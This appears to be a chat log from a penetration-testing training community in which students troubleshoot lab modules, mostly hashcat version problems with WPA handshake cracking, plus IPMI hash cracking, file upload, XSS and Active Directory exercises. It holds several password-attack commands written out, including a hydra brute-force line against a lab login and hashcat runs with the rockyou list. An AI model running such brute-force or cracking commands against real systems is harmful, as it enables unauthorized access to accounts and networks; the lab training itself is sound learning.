you’re using python3, the 7z2john module is python2

People still use python2 nowadays ???

XD

@lusty idol thanks for helping

they shouldn't, but that was written a long time ago

Sorry to keep spamming this chat but
The hashcat module is kicking my butt. I think that some of the info in this module is pretty outdated hence why i am having some trouble. Im on the cracking wireless wpa/wpa2 section. I am required to convert .cap file to .hccapx . I am then expected to crack the .hccapx file with hashcat mode 2500

First error using mode 2500

Second error using mode 22000

what did you use to go to hccapx?

The module tells you to use cap2hccapx.bin from the hashcat-utils repo

Which I have done and it still doesnt work

I was wondering if they had updated that. I used that to convert and was able to get the flag using the same command you used. I have to wonder if something in the conversion didnt work.

DM me if you want

I’ve seen many people complain about this specific section on #858470491676737536 so I think this module might need some fixing in general

let me spawn and try it

no

Did you get it to work?

So @lethal atlas is having issues with this problem as well. @livid pier can you get this to work lol? 😭 This module is waaaay frustrating

For Footprinting IPMI module, Q2 to identify the plaintext password...is metasploit supposed to auto crack this using their inbuilt ipmi wordlist? Unfortunately it doesn't auto crack for me and using hashcat will take 7 days on the Pwnbox and 4 hours with my gfx card....I'm guessing this isn't the route to go down though. Has anyone already completed this module and remember if the password autocracked in metasploit?

I manually ran the salted hash through hashcat using the metasploit ipmi wordlist and confirmed it didn't crack :/

I cracked the hash with john at the time.

set OUTPUT_JOHN_FILE john.txt

This can then be easily cracked with john.

cheers, will run it through john 🙂

@raven cairn do you have a VM you can use? seems like after the latest pwnbox update there are weird issues on some modules

I have a laptop with kali installed. I wasn’t using pwnbox

@raven cairn you are on the hccapx part right?

I’ve already coverted to .hccapx . I’m having problems cracking the hash

I get the same error he gets

might be using wrong hash mode number, in my notes i used 2500.

I get an error with either now. I have cracked it before but it fails now

well crap 😦

i get this /sys/class/hwmon/temp1_input: No such file or directory

I tried it on another machine and get the same error. I think the zip file might be jacked up

Me too ^^^

I think hash mode 2500 doesn’t work anymore

New hashcat will also autodetect

I did this module like month ago but there wasn't anything tricky or outdated. But on the other side I was using my rhel8 workstation (with GPU) which have probably older packages so probably thats main difference. In my notes I was using -m 2500 without any issues.

Are you still stuck? If so what mod and section?

I’m still stuck.

Module: Cracking passwords with hashcat
Section: Cracking wpa/wpa2 handshakes with hashcat.

K which question?

First one

looks like your conversion wasn't successful - for me it works with -m 2500 as well as with -m 22000 without errors (I am on 6.1.1 where 2500 wasn't deprecated) but anyway it works with 22000 .

@raven cairn - what command you used for conversion to hccapx ? (I saw only python3 error above)

My guess is it looks like this

^^^ it looks like that

sha256sum output.hccapx
7ec29433ca0eb72328c7192f8eacb38999dadd36080c13f5b47b94ec85348596 output.hccapx

tried to generate another one and checksum is identical so maybe you can compare if it generates correct file for you so we know you are cracking correct file

What should i be using to convert the .cap file?

./cap2hccapx.bin input_file.cap output_file.hccapx

I’ll get back to it later and tell you guys how it goes. I’m doing discrete math homework right now. Thanks for the help

Should get more integrated

ok good luck. Compare your sha256 checksum it must match since mine and @livid pier hashes of generated file are identical ...

I get the same error as they do, but with the right file

what version of hashcat you are using ?

this is the latest kali version ?

I think so

hello, I need some help on the 'common applications'-module section OSticket, please dm if you can help

@raven cairn - I can confirm what Vivis said above that on 6.2.5 hashcat version from latest kali its broken. On 6.1.x it works. I don't have other 6.2.x version to compare.

└──╼ [★]$ hashcat --version
v6.1.1

You can use version from pwnbox that will work @raven cairn

hcxpcapngtool -o test.22000 corp_question1-01.cap
just generated correct file via different method for -m 22000
this works fine with 6.2.5

Hello there im on windows file upload module , trying to encode the zip file using $b64 = [System.convert]::ToBase64String((Get-Content -Path 'c:/home/chris/HTB_Academy/upload_win_file_trans.zip' -Encoding Byte))

and im getting this Get-Content: A parameter cannot be found that matches parameter name 'Encoding'.

is something wrong with Get-Content module ?

Anyone able to give me a nudge on File Upload Attacks skills assessment? I believe I know what directory my file has been uploaded to, but don't understand how it's being renamed.

Edit. Solved! The fact that the server is in EU timezone threw me off!

💪😎 thanks you so much for all the people who helped me with my question. I was extracting the hash correctly however because i was using an updated version of hashcat on kali the cracking did not work. Switching to pwnbox resolved my issues. I really appreciate the time you guys/girls put in to help me.

-Encoding byte refers to the encoding byte you are trying to use.

What section?

did you use the env command?

Specify the path. Your answer is close

@placid patio I like the camus quote in your profile lol

I have learned that often the simple solution is the best

click on your avatar, then click the edit profile link (the pencil )

IN academy?

I thought he meant on here

firefox is pretty much all i use

Is there anyone that could help with Skills Assessment from Using Web Proxies ?

Hi

Hi

Hu

Which question?

the first one.

k let me take a look

OK six years later got it

😄 it's ok. You even got it, I did not

ok so what have you tried and whats not working? what do you think you should be doing?

so

As long as I understand I was able to enable the button, but when I click just refreshes the page. The hint says ||click many times|| so I was researching and i stumbled of clickhijacking, but I'm not sure this is the thing I should do. In addition, that's a feature that it only available in burp pro, didn't find that for ZAP

I tried that in burp. repeat the request many time, but I look at the source code, when I intercept the request, the changes I made in the HTML code goes away

dm me screenshots

sure

Can you hang a couple of minutes ? Just a few more minutes and I'll be out of my job.

Ya im chilln

Hello guys, sorry if this is the wrong channel , I am currently following some modules and i have some problems with Burpsuit , the target is up an running i can connect to it but when burptsuit is activated is browser is very very slow .. Can you please let me know how to fix this? Thank you !

what's the real problem , with the browser or burp

When the extension is on burp from firefox .. i am not able to reach the target anymore

what about the burp configuration

I just did what is saying in the module :/

case solved , thanks @feral gyro

Im also stuck there! I cant get the proxy to work after doing the config part.
Did you run into any issues there?

what are you having issues with?

So I was asked to configure as the picture.
But when I ran proxychains it complained about me using https so I commented it out and then it worked oO

Hello there, I am doing the XSS module, but in the Phishing and Session Hijacking sections, I cannot access the web app at IP/phishing/send.php although it seems the machine spawns correctly. Anybody having the same troubles? Actually just realized that the target spawns without a port... I don't believe the default 80/443 are used

No

Hi im doing the information gathering module and im stuck with this. https://cdn.discordapp.com/attachments/895359577401458713/945403122942107738/123123.PNG

How can i access vHosts?

Modify your /etc/hosts file to have the target IP point to these -- you can get pw (as need sudo) to modify in ~/Desktop/my_credentials.txt

ty

Hi guys

i'm stuck with the second question of the last skills assessment ffuf module

fuzzing web extension

i've added the 3 subdomain founded in /etc/hosts

and then i've fuzzed all of them with seclist web extensions list

i've found 3 extensions

two of them whit 200 code

i've tried to enter those two like the answer

but nothing to do

any suggestion?

may I ask what domains you have checked?

and did you add all of those to the /etc/hosts?

@honest flower pls be careful with spoilers

Hi i need help with footprinting hard lab i am almost there can i dm ?

Can i dm?

yes

Sorry!

@slow bluff yep

Hi, i'm doing the Login Brute Forcing with Hydra,
on skill assesment: Website second question:

Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

anyone has an hint for solve?

i have tried||
hydra -l m.gates -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 206.189.124.101 -s 32131 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'"
||

but without result, i have tied other usename like b.gates, admin ma no success

dm me

@drifting knoll have we figured out why the hashcat module doesnt work on a kali VM but works on pwnbox?

is anyone available to help with a question on the XSS module? EDIT: Found the issue.

Pwnbox is using an older version of hashcat than kali. This can cause issues doing the hashcat module on a kali vm. I have just finished the hashcat module and I hope that it gets fixed a little bit, since completing it was an absolute nightmare because some of the info was outdated.

LOL I was asking because of our conversation last night.

Did you ever figure this out my friend? I have found myself in the same position.

Everything looks like a success, but rock you.txt inevitably becomes exhausted.

$./cap2hccapx corp_question1-01.cap whatevername.hccapx

looks successful...

$sudo hashcat -a 0 -m 2500 whatevername.hccapx /opt/useful/Seclists/Passwords/Leaked-Databases/rockyou.txt

... Exhausted 😔😣😫😭

Need some help? Just finished the hash-cat module yesterday. This module needs fixing lol

I need some help. Introduction ro bash scripting module, section 4. Here's my code. I don't understand why it doesn't give any output
#!/bin/bash
var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2p1TlJYTkxDZz09Cg"

for i in {1..40}
do
var=$(echo $var | base64)
if [[ ${#var} -gt 113496 && "$var" == "$value"]]; then
echo ${var: -20}
fi
done

I'm stuck. I cracked question #2 but the 1st is a p.i.t.a. (★)

Hello guys, I am stuck at final assestment of File Upload Attack.
How can I know the directory of file upload?
I tried to read the source code but cannot findout it 😦

@flat patrol

To be honest I am having a little bit of trouble understanding what you are having problems with. (The picture you sent is a bit low quality ngl)
Make sure you converted the hash right and check if the sha256sum is the same. Make sure you are using a hashcat version 6.1.x .

looks like I got it right

Type in “hashcat —version” and send the results

6.1.1

Weird

running again now -a 0 -m 2500 question1.hccapx /pathto/rockyou.txt

Are you sure rockyou.txt was exhausted? If you are doing both of those things it should work

You can also use —show to show results if you didnt know already

ok... my 120 minute lab is almost up, so I will let it run as is until time runs out or it's cracked. I got about 27 min left. thanks for the help, at least I know my hash is good

If that doesnt work You can dm me. I have some stuff to do tonight so it might take a lil bit to help tho

fail... at least it finished with 4 minutes left or so.

I just cracked the hash with those commands in pwnbox so i know that the commands you did were right

Use —show

I was quite literally working on this problem all day yesterday because i had some obscure technical errors 🤣 . I know this question in and out.

There should be 5 cracked hashes you will see in your potfile. The first one will give you the cubes for the module.

Anyone able to give me a nudge on "Command Injections" skills assessment? I can't seem to find the injection point, I suspect it's somewhere when copying/moving a file but I'm not having any luck.

Edit: Solved!

check the hint

u are on the right track

He is close!

yep

still need help?

yeah my friend

try to read the source code and find the dir where ur files get uploaded

@rich mulch what threw me off was the fact that the server is in EU time zone so it was a day ahead

does that matter

Based on how it renames the file it did, the server was a day ahead of me

i think for ist it makes some sense

@flat patrol Works on my machine

You mean this? But I dont understand navigate to this directory

u said u got the source code ?

just Ctrl + U to see the source code right?

try to read the section limited file uploads

who do i talk to when i found a typo in a command in the Active Directory LDAP module?

erratum

thanks 🙂

got it, thanks bro

Can anyone help me w AD question? I've connected and loaded PS but keep getting error when trying to Add user...

the dropdown walkthrough shows a path that i cant seem to find also...is this why i cant add the user?

try changing the password